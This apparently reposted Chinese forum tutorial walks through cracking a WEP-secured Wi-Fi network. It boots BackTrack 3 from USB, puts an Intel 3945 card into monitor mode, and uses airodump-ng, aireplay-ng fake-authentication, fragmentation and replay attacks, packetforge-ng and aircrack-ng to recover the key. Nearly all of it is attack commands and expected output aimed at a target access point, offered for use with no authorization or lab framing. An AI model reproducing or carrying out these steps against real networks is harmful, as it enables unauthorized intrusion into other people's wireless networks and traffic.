我是薛毅华

1. 环境：Intel Proset 3945 a/b/g无线网卡

2. 下载BT3，解压到U盘（根下BOOT、BT3目录）

3. 运行BOOT下的bootinst.bat，制作U盘启动

4. reboot PC，按F12进入BOOT MENU，选USB

5. 进入BT3菜单，选BT3 Graphics mode (compiz Nvidia)-Experimental

6. 打开一个shell

7. #ifconfig –a（记下本机网卡MAC）

8. 显示无线网卡为wlan0

9. #ifconfig wlan0 up

10. #airmon-ng

11. 显示无线网卡为iwl3945

12. #modprobe –r iwl3945

13. #modprobe ipwraw

#airmon-ng start wifi0 6 将网卡设置成AP监听模式

14. #iwconfig
15. 显示无线网卡已变成wifi0、monitor mode

继续:
1. # airodump-ng –ivs -w name -c 6 wifi0（name是存盘的文件名，6是cannel号）

2. 显示要破解的ap的essid 和mac ，并记下ap的essid 和mac。（#data为0时则为无客户端AP，不能继续）

3. 不关闭这个shell，另开一个shell

4. #aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac wifi0

5. 显示以下信息则为成功

Sending Authentication Request

Authentication successful

Sending Association Request

Association successful

21．#aireplay-ng -5 -b ap的mac -h 自己网卡的mac wifi0来获得xor文件

如果一切顺利，系统将显示

Use this packet ?

输入y回车，将得到一个xor文件（以fragment开头）

再输入ls 查看当前目录，你将看到刚才生成的一个后缀名为xor 的文件。

22．#packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment -****-****.xor -w mrarp 其中，-l中的l是L的小写，别和1混淆，而其中的fragment-****-****.xor是刚才生成的文件名。

系统显示：Wrote packet to: mrarp

23．#aireplay-ng -2 –r mrarp -x 1024 wifi0(-x 1024 是限定发包速度，避免网卡死机，选择1024)

输入y回车

前面的抓包窗口上的#data将迅速增加

24．另开shell

25．#wesside-ng –i wifi0 –v ap的MAC，破解完成。

26．到#data增加到3万以上时，另开shell

27．#aircrack-ng -n 64 -b ap的mac name-01.ivs

其中64是64位密码，如果是128位，换成128即可。

(注:摘之网文,还有许多破解方法,破解步骤都差不多,要灵活变通,如有疑问,请多交流.)